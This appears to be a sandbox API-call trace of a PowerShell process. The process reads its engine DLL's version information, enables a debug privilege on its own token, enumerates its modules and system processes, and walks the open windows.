	[0246.228] CoTaskMemFree (pv=0x25a370) 
	[0246.228] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c574a4, puLen=0x12dc40) returned 1
	[0246.228] lstrlenW (lpString="System.Management.Automation") returned 28
	[0246.228] CoTaskMemAlloc (cb=0x3c) returned 0x1d8ee0
	[0246.228] lstrcpyW (in: lpString1=0x1d8ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0246.229] CoTaskMemFree (pv=0x1d8ee0) 
	[0246.229] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c57500, puLen=0x12dc40) returned 1
	[0246.229] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0246.229] CoTaskMemAlloc (cb=0x20) returned 0x258b20
	[0246.229] lstrcpyW (in: lpString1=0x258b20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0246.229] CoTaskMemFree (pv=0x258b20) 
	[0246.229] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c57540, puLen=0x12dc40) returned 1
	[0246.229] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0246.229] CoTaskMemAlloc (cb=0x44) returned 0x1d8ee0
	[0246.229] lstrcpyW (in: lpString1=0x1d8ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0246.229] CoTaskMemFree (pv=0x1d8ee0) 
	[0246.229] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c575a8, puLen=0x12dc40) returned 1
	[0246.229] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0246.229] CoTaskMemAlloc (cb=0x76) returned 0x203e30
	[0246.229] lstrcpyW (in: lpString1=0x203e30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0246.229] CoTaskMemFree (pv=0x203e30) 
	[0246.229] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c57644, puLen=0x12dc40) returned 1
	[0246.229] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0246.229] CoTaskMemAlloc (cb=0x44) returned 0x1d8ee0
	[0246.229] lstrcpyW (in: lpString1=0x1d8ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0246.229] CoTaskMemFree (pv=0x1d8ee0) 
	[0246.229] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c576a8, puLen=0x12dc40) returned 1
	[0246.229] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0246.229] CoTaskMemAlloc (cb=0x58) returned 0x1b59e0
	[0246.229] lstrcpyW (in: lpString1=0x1b59e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0246.229] CoTaskMemFree (pv=0x1b59e0) 
	[0246.229] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c57724, puLen=0x12dc40) returned 1
	[0246.229] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0246.229] CoTaskMemAlloc (cb=0x20) returned 0x258b20
	[0246.229] lstrcpyW (in: lpString1=0x258b20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0246.229] CoTaskMemFree (pv=0x258b20) 
	[0246.229] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x2c573cc, puLen=0x12dc40) returned 1
	[0246.230] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0246.230] CoTaskMemAlloc (cb=0x66) returned 0x24a720
	[0246.230] lstrcpyW (in: lpString1=0x24a720, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0246.230] CoTaskMemFree (pv=0x24a720) 
	[0246.230] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x0, puLen=0x12dc40) returned 0
	[0246.230] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x0, puLen=0x12dc40) returned 0
	[0246.230] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dc48, puLen=0x12dc40 | out: lplpBuffer=0x12dc48*=0x0, puLen=0x12dc40) returned 0
	[0246.230] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dc18, puLen=0x12dc10 | out: lplpBuffer=0x12dc18*=0x2c57374, puLen=0x12dc10) returned 1
	[0246.231] CoTaskMemAlloc (cb=0x204) returned 0x206840
	[0246.231] VerLanguageNameW (in: wLang=0x0, szLang=0x206840, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0246.232] CoTaskMemFree (pv=0x206840) 
	[0246.232] VerQueryValueW (in: pBlock=0x2c572d8, lpSubBlock="\\", lplpBuffer=0x12dc68, puLen=0x12dc60 | out: lplpBuffer=0x12dc68*=0x2c57300, puLen=0x12dc60) returned 1
	[0246.246] GetCurrentProcessId () returned 0x7b4
	[0246.259] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12cb90 | out: lpLuid=0x12cb90*(LowPart=0x14, HighPart=0)) returned 1
	[0246.261] GetCurrentProcess () returned 0xffffffffffffffff
	[0246.261] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12cbb0 | out: TokenHandle=0x12cbb0*=0x2e8) returned 1
	[0246.262] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2c5ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0246.263] CloseHandle (hObject=0x2e8) returned 1
	[0246.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b4) returned 0x2e8
	[0246.274] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2c5abb8, cb=0x200, lpcbNeeded=0x12dbc8 | out: lphModule=0x2c5abb8, lpcbNeeded=0x12dbc8) returned 1
	[0246.276] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2c5ae28, cb=0x18 | out: lpmodinfo=0x2c5ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0246.276] CoTaskMemAlloc (cb=0x804) returned 0x261c20
	[0246.277] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x261c20, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0246.277] CoTaskMemFree (pv=0x261c20) 
	[0246.277] CoTaskMemAlloc (cb=0x804) returned 0x261c20
	[0246.277] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x261c20, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0246.278] CoTaskMemFree (pv=0x261c20) 
	[0246.278] CloseHandle (hObject=0x2e8) returned 1
	[0246.731] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x7b4) returned 0x2e8
	[0246.732] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x12dcf8 | out: lpExitCode=0x12dcf8*=0x103) returned 1
	[0246.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b088, Length=0x20000, ResultLength=0x12dcc0 | out: SystemInformation=0x12c5b088, ResultLength=0x12dcc0*=0xf590) returned 0x0
	[0246.752] EnumWindows (lpEnumFunc=0x22866ac, lParam=0x0) returned 1
	[0248.387] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0248.808] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x558
	[0248.808] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.155] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.155] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x538
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x778
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x778
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.156] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x460
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0xa04
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x924
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x8dc
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x7dc
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x768
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x764
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x820
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x810
	[0249.157] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x794
	[0249.158] GetWindow (hWnd=0x301f2, uCmd=0x4) returned 0x0
	[0249.159] IsWindowVisible (hWnd=0x301f2) returned 0
	[0249.159] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x83c
	[0249.159] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x7ac
	[0249.159] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0xb44
	[0249.159] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0xb5c
	[0249.159] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x838
	[0249.159] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.159] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.159] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.159] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x818
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x5b8
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x494
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x1ec
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x440
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x7e8
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x730
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x2c8
	[0249.160] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x31c
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x330
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x128
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x5c8
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x6f8
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x358
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x73c
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0xb0
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x250
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x240
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x790
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x61c
	[0249.161] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x540
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x538
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x568
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x538
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x568
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x538
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x540
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x540
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x510
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x57c
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x460
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x554
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x528
	[0249.162] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x79c
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4e0
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x460
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x460
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x44c
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x778
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x460
	[0249.163] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x558
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4d0
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0xa28
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x9b0
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x8d8
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x940
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x93c
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4ec
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x150
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x720
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x3c4
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x7d4
	[0249.164] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x6c8
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0xb54
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0xb54
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0xb5c
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x838
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x818
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x5b8
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x494
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x1ec
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x440
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x7e8
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x730
	[0249.165] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x2c8
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x31c
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x330
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x128
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x5c8
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x6f8
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x358
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x73c
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0xb0
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x250
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x240
	[0249.166] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x790
	[0249.167] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x61c
	[0249.167] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x568
	[0249.167] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x538
	[0249.167] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x540
	[0249.167] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x510
	[0249.167] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x460
	[0249.167] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x79c
	[0249.167] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x4e0
	[0249.167] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x460
	[0249.168] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x12da20 | out: lpdwProcessId=0x12da20) returned 0x778
	[0249.170] WerSetFlags () returned 0x0
